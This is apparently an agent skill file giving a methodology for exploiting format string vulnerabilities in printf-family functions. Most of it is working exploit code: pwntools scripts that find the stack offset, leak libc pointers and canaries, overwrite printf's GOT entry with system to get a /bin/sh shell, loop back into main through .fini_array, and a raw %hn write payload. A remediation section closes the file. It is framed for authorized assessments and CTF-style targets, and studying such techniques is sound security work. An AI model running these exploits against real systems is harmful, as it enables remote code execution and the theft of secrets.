exploiting-format-string-vulnerabilities

Name: exploiting-format-string-vulnerabilities
Author: xalgord/xalgorix

$npx mdskill add xalgord/xalgorix/exploiting-format-string-vulnerabilities

---
name: exploiting-format-string-vulnerabilities
description: Methodology for exploiting format string bugs where attacker-controlled data reaches the format argument of
  printf-family functions, enabling stack/memory disclosure (info leaks for ASLR/PIE/canary defeat) and arbitrary write
  primitives (%n) to hijack control flow via GOT/.fini_array overwrites.
domain: cybersecurity
subdomain: binary-exploitation
tags:
- binary-exploitation
- format-string
- exploit-development
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Exploiting Format String Vulnerabilities

## When to Use

- During authorized binary/exploitation assessments when attacker input is passed as the **first argument** (the format)
  to `printf`, `fprintf`, `sprintf`, `snprintf`, `vprintf`, `syslog`, or similar.
- When you need a memory-disclosure primitive to leak stack contents, a libc/PIE pointer, or a stack canary to defeat
  ASLR/PIE/canary protections.
- When you have an arbitrary-write primitive opportunity via `%n`/`%hn` to overwrite a GOT entry, `.fini_array`, a saved
  return address, or a function pointer.
- On Windows x64 services where a buggy `_snprintf(dst, len, attacker_fmt)` call passes no varargs, so the first
  conversion reads whatever is in R9 (RCX/RDX/R8 hold `dst`, `len`, and the format) and later ones read stack slots.

## Critical: Concepts/Steps Most Often Missed

- **Put the format specifiers BEFORE the target address, not after (64-bit).** `printf` stops reading at the first NUL
  byte. If you send `p64(addr) + b"%7$s"`, the address (whose high bytes are NUL on x86-64) terminates the string and the
  specifiers are never processed. Send `b"%7$s" + padding + p64(addr)` instead, and align so the address lands on a
  pointer boundary. On 32-bit targets addresses usually contain no NUL byte, so an address-first layout still works.
- **Use `%hn` (2 bytes), not `%n` (4 bytes), for full addresses.** Writing a 4-byte value like `0x08049724` in one go
  requires printing about 134 million characters. Split the write into two `%hn` operations (high and low halves) and
  emit the smaller half-value first, because the printed-character count only grows.
- **Confirm the offset precisely.** Sending `AAAA%p%p%p...` is not enough; brute-force `AAAA%N$p` until the output shows
  `0x41414141` and verify with `BBBB` that you control a full aligned pointer slot. Off-by-one offset errors silently
  read the wrong slot.
- **`%n` writes are disabled by FORTIFY.** glibc's `_FORTIFY_SOURCE=2` aborts on `%n` when the format string lives in
  writable memory; on those targets you are limited to read primitives (still enough to leak a canary or libc pointer
  and pair with another bug).
- **Let pwntools do the math.** `FmtStr()` can discover the offset automatically and `fmtstr_payload()` crafts the
  multi-write payload; manual HOB/LOB arithmetic is error-prone.
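
The first bullet can be checked without a target. The sketch below is illustrative only: `read_payload` and `buf_offset` are hypothetical names, and it assumes a 64-bit little-endian target whose buffer starts on an 8-byte boundary at argument index `buf_offset`. It shows what `printf` would see for an address-first payload and builds the specifier-first layout instead.

```python
import struct

def read_payload(addr, buf_offset, word=8):
    """Return b"%N$s" + padding + packed address for a 64-bit target.

    buf_offset is the argument index where the first word of our buffer
    appears (assumed to be known already). N is chosen so that it points
    at the slot holding the packed address.
    """
    slots = 1  # number of words reserved for the specifier text
    while True:
        spec = b"%%%d$s" % (buf_offset + slots)
        if len(spec) <= slots * word:
            break
        slots += 1
    return spec.ljust(slots * word, b"|") + struct.pack("<Q", addr)

addr = 0x404020
address_first = struct.pack("<Q", addr) + b"%7$s"
# printf treats the buffer as a C string: it only sees bytes before the first NUL.
seen_by_printf = address_first.split(b"\x00", 1)[0]
print(seen_by_printf)                    # b' @@' : the specifier is never reached
print(read_payload(addr, buf_offset=6))  # b'%7$s|||| @@\x00\x00\x00\x00\x00'
```

With the buffer at index 6, the 8 bytes of specifier and padding fill slot 6 and the address occupies slot 7, which is what `%7$s` dereferences.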

### How to CONFIRM

A read primitive is confirmed when a chosen `%N$p`/`%N$s` returns *attacker-known* data: send `b"AAAA%6$p"` and confirm
`0x41414141` (or `0x...41414141` on 64-bit) appears in the output — that proves your buffer is at stack arg 6. A write
primitive is confirmed by reading back the target: overwrite a GOT entry with a sentinel, then dump it with `%s`/`%p` and
verify the bytes changed, or set a breakpoint in gdb on the write target and observe the value land.
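
The read-primitive check can be automated with a small parser. This is a minimal sketch, not part of pwntools: `leaked_words` and `contains_marker` are hypothetical helpers that take raw program output and report whether any leaked word begins with the marker when viewed as little-endian bytes. Requiring the marker at the start of the word also catches misaligned buffers.

```python
import re

def leaked_words(output):
    """Return every 0x... value found in the program output as an int."""
    return [int(m, 16) for m in re.findall(rb"0x[0-9a-fA-F]+", output)]

def contains_marker(output, marker=b"AAAA", word=8):
    """True if a leaked word, read as little-endian bytes, starts with marker."""
    for value in leaked_words(output):
        if value >= 1 << (8 * word):
            continue  # not a single machine word, ignore it
        if value.to_bytes(word, "little").startswith(marker):
            return True
    return False

print(contains_marker(b"AAAA0x41414141"))          # 32-bit style leak -> True
print(contains_marker(b"AAAA0x7024362541414141"))  # 64-bit slot holding b"AAAA%6$p" -> True
print(contains_marker(b"AAAA0x7ffe1234abcd"))      # unrelated stack pointer -> False
```

A word such as `0x4141414100000000` is rejected on purpose: the marker sits in the upper bytes, so the buffer does not start on a slot boundary and needs padding.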

## Workflow

### Step 1: Confirm the Bug and Find the Argument Offset

```python
from pwn import *
context.binary = elf = ELF('./chall', checksec=False)

# Brute-force the stack offset where our input lands
for i in range(1, 50):
    p = process('./chall')
    p.sendline(f"AAAA%{i}$p".encode())
    out = p.clean(timeout=0.5)
    p.close()
    # Match without the 0x prefix: on 64-bit the slot prints as 0x...41414141
    if b"41414141" in out:
        log.success(f"Input is at offset {i}")
        break
```

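A quick manual probe: send `%p %p %p %p %p %p`. If `printf(buffer)` answers with stack values instead of echoing the
literal text, the input is being interpreted as a format string; `%x`/`%p` output that contains your own bytes (for
example `41414141`) shows the buffer itself is reachable as an argument.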

### Step 2: Build the Read Primitive (Leak Stack / libc / Canary)

```python
p = process('./chall')

# Read an arbitrary address: format specifier FIRST, address LAST (no early NUL)
payload  = b"%7$s"            # assuming the buffer starts at offset 6, the next 8-byte slot is 7
payload += b"|" * (8 - len(b"%7$s"))   # pad so the pointer is 8-aligned
payload += p64(0x404020)      # address to dereference and print as string
p.sendline(payload)
log.info(p.clean())

# Leak a libc pointer from the stack, then compute base
p.sendline(b"%25$p")
leak = int(p.recvline().strip(), 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# The +243 return offset is specific to one libc build; confirm it in gdb for the target's libc
libc.address = leak - libc.symbols['__libc_start_main'] - 243
log.info("libc base @ %#x", libc.address)
```

Reads are useful to dump the binary from memory and to grab canaries, encryption keys, or hardcoded passwords stored on
the stack/BSS.
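
Leaked values are easier to trust with two sanity checks. The sketch below is a heuristic under stated assumptions (x86-64 Linux, glibc-style canary with a zero low byte, user-space pointers below 2^47). `base_from_leak` and `looks_like_canary` are hypothetical helper names, and the offset `0x24083` is an illustrative placeholder, not a value to reuse.

```python
PAGE_SIZE = 0x1000

def base_from_leak(leak, offset_in_module):
    """Subtract the known offset and insist on a page-aligned result."""
    base = leak - offset_in_module
    if base % PAGE_SIZE:
        raise ValueError(f"base {base:#x} is not page-aligned: wrong offset or wrong libc?")
    return base

def looks_like_canary(value):
    """Heuristic: low byte is zero and the top 16 bits are set.

    User-space pointers keep the top 16 bits clear, while a random canary
    almost always has some of them set.
    """
    return value & 0xff == 0 and value >> 48 != 0

leak = 0x7ffff7dc9083                      # example value read with %25$p
print(hex(base_from_leak(leak, 0x24083)))  # 0x7ffff7da5000
print(looks_like_canary(0x3a5f9c0b7e11d200))  # True
print(looks_like_canary(0x7ffff7da5000))      # False: page-aligned pointer, not a canary
```

A base that is not page-aligned almost always means the offset came from a different libc build than the one on the target.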

### Step 3: Build the Write Primitive and Hijack Control Flow

```python
# Let pwntools craft the multi-%hn write. Overwrite printf@GOT -> system
payload = fmtstr_payload(offset, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
# Next call to printf(user_input) now runs system(user_input)
p.sendline(b'/bin/sh')
p.interactive()
```

Manual two-step `%hn` (when not using pwntools): place both target addresses at the start of the buffer, then write the
smaller 16-bit half first (in this example the high-order half) with `%.<pad>x%<arg>$hn`:

```bash
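# Example: write 0xbffffc2f to 0x08049724 as two 16-bit halves (addresses at offsets 4 and 5)
# Python 3 raw-bytes output; print() would UTF-8-encode bytes such as \x97
python3 -c 'import sys; sys.stdout.buffer.write(b"\x26\x97\x04\x08" + b"\x24\x97\x04\x08" + b"%.49143x" + b"%4$hn" + b"%.15408x" + b"%5$hn" + b"\n")'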
```
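
The padding numbers in the manual example can be derived rather than worked out by hand. The following is a minimal sketch for 32-bit targets only. `two_hn_payload` is a hypothetical helper, and it assumes the payload starts at argument index `offset`, that neither address contains a NUL byte, and that padding is emitted with `%<n>c` (the form pwntools also uses) rather than `%.<n>x`.

```python
import struct

def two_hn_payload(addr, value, offset):
    """Build a payload that writes the 32-bit `value` at `addr` with two %hn.

    The two halves are sorted so the smaller count is written first; the
    matching target addresses are packed in that same order at the start of
    the buffer, occupying argument slots `offset` and `offset + 1`.
    """
    halves = sorted([(value & 0xffff, addr), (value >> 16, addr + 2)])
    payload = b"".join(struct.pack("<I", target) for _, target in halves)
    printed = len(payload)  # the 8 address bytes are printed before any padding
    for i, (half, _) in enumerate(halves):
        pad = (half - printed) % 0x10000  # %hn keeps only the low 16 bits
        if pad:
            payload += b"%%%dc" % pad
        payload += b"%%%d$hn" % (offset + i)
        printed += pad
    return payload

print(two_hn_payload(0x08049724, 0xbffffc2f, offset=4))
```

For address `0x08049724`, value `0xbffffc2f`, and offset 4 this yields paddings of 49143 and 15408, the same counts as the one-liner above: 8 + 49143 = 0xbfff and 0xbfff + 15408 = 0xfc2f.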

### Step 4: Make the Bug Reusable / Escalate

```python
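# If you need another pass through the vulnerable code, overwrite the first
# .fini_array entry so the program re-enters main when it exits.
def send_payload(payload):           # callback FmtStr uses to deliver a payload
    p.sendline(payload)
    return p.clean(timeout=0.5)

padlen = 0                           # bytes the program places before our format string
INIT_LOOP_ADDR = elf.symbols['main'] # where to re-enter (assumes an unstripped, non-PIE binary)
fini_array = elf.get_section_by_name('.fini_array').header.sh_addr
fmt = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
fmt.write(fini_array, INIT_LOOP_ADDR)             # loop back
fmt.write(elf.got['printf'], elf.plt['system'])   # redirect (binary must import system)
fmt.execute_writes()                              # both queued writes go out in one payload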
```

On Windows x64, prepend `%p` to leak whatever pointer sits in R9 at the call-site, recover the module base as
`leak - known_offset`, and reuse it to compute gadget/IAT addresses for a ROP chain.

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Format specifier** | `%x`/`%p` read stack words, `%s` dereferences a pointer and prints a string, `%n` writes the byte count to a pointed address. |
| **Direct parameter access** | `%N$x` selects the N-th argument directly (e.g. `%4$p` reads the 4th), avoiding long specifier chains. |
| **Argument offset** | The stack index at which attacker-controlled input appears; the anchor for both read and write primitives. |
| **`%n` / `%hn` / `%hhn`** | Write the number of bytes printed so far into an address: 4 bytes / 2 bytes / 1 byte respectively. |
| **HOB / LOB** | High-order and low-order 16-bit halves of the value being written (often an address); each is written with its own `%hn`. |
| **GOT overwrite** | Replacing a GOT entry (e.g. `printf`) with another function (e.g. `system`) so the next call is redirected. |
| **`.fini_array` loop** | Overwriting a destructor pointer to re-enter `main`, giving extra exploitation passes. |
| **Width padding** | `%<num>c` or `%.<num>d` prints at least `num` characters from a short specifier, so `%n` can write a large value without a huge buffer. |
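
The size semantics in the table can be modelled in a few lines. This is an illustrative sketch, assuming the common ABIs where `%n` stores an `int` (4 bytes); `stored` and `hhn_pads` are hypothetical names. It shows that each specifier keeps only the low bytes of the running character count, which is why byte-wise `%hhn` writes can wrap past 255 instead of needing sorted values.

```python
WIDTHS = {"%n": 4, "%hn": 2, "%hhn": 1}  # bytes stored by each conversion

def stored(count, spec):
    """Value left in memory by `spec` after `count` characters were printed."""
    return count & ((1 << (8 * WIDTHS[spec])) - 1)

def hhn_pads(value, nbytes, printed=0):
    """Extra characters to print before each %hhn, lowest byte first."""
    pads = []
    for i in range(nbytes):
        byte = (value >> (8 * i)) & 0xff
        pad = (byte - printed) % 256  # wrap around instead of sorting
        pads.append(pad)
        printed += pad
    return pads

print(hex(stored(0x1fc2f, "%hn")))  # 0xfc2f
print(hex(stored(273, "%hhn")))     # 0x11
print(hhn_pads(0x401196, 3))        # [150, 123, 47]
```

In the last line the running counts are 150, 273, and 320, whose low bytes are `0x96`, `0x11`, and `0x40`: the three bytes of `0x401196` in little-endian order.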

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **pwntools** | `fmtstr_payload`, `FmtStr`, `ELF.got`/`ELF.plt`/`ELF.symbols`, process/remote IO, automated offset detection. |
| **gdb + pwndbg/GEF** | Inspect the stack at the `printf` call, confirm writes landed, set breakpoints on GOT targets. |
| **checksec** | Detect RELRO (full RELRO makes GOT read-only), FORTIFY (`%n` blocked), PIE, canary. |
| **objdump / readelf** | Enumerate GOT/PLT entries and `.fini_array`/`.init_array` addresses. |
| **radare2 / Ghidra** | Reverse the call-site to confirm the format argument is attacker-controlled and find static offsets (Windows base recovery). |
| **one_gadget** | After a libc leak, find a single-shot shell gadget to target with the write. |

## Common Scenarios

### Scenario 1: Stack secret leak (no flow control needed)
`printf(buffer)` echoes user input. Brute-forcing `%N$s` reveals a hardcoded password stored on the stack at offset 10,
or `%N$p` leaks a heap/libc address — enough to win without altering execution.

### Scenario 2: GOT overwrite to system
A 32-bit no-RELRO binary calls `printf(user)` in a loop. `fmtstr_payload(5, {got['printf']: libc.sym['system']})`
redirects `printf` to `system`; the next iteration with input `/bin/sh` spawns a shell.

### Scenario 3: ret2win via .fini_array + GOT
With only a one-shot format string, the attacker overwrites `.fini_array` to loop back to `main`, then on the second
pass writes the `win`/`system` address into a GOT slot that is used right after.

### Scenario 4: Windows x64 ASLR defeat
A service does `_snprintf(dst, 0xff2, keyData)` with no varargs. A leading `%p` prints the value in R9 — a stable
in-module pointer — letting the attacker compute the image base and bootstrap a ROP chain.

## Output Format

```
## Format String Finding

**Vulnerability**: Uncontrolled format string (CWE-134)
**Severity**: Critical (arbitrary read+write -> RCE) / High (info leak only)
**Binary**: ./chall (x86-64, Partial RELRO, No PIE, No FORTIFY)
**Call site**: printf(user_input) in handle_request()

### Primitive Confirmation
- Read: input at stack offset 6 (AAAA%6$p -> 0x...41414141)
- Leak: libc base @ 0x7ffff7da5000 via %25$p
- Write: %hn enabled (no FORTIFY), Partial RELRO -> GOT writable

### Exploitation
fmtstr_payload(6, {got['printf']: libc.sym['system']})
Result: printf("/bin/sh") executed system("/bin/sh") -> shell as service user.

### Impact
Arbitrary memory read/write leading to remote code execution.

### Recommendation
1. Never pass user input as the format argument: use printf("%s", user_input).
2. Compile with -Wformat -Wformat-security -Werror=format-security and -D_FORTIFY_SOURCE=2 (needs -O1 or higher).
3. Enable Full RELRO (-Wl,-z,relro,-z,now) to make the GOT read-only.
4. Enable PIE/ASLR and stack canaries.
```
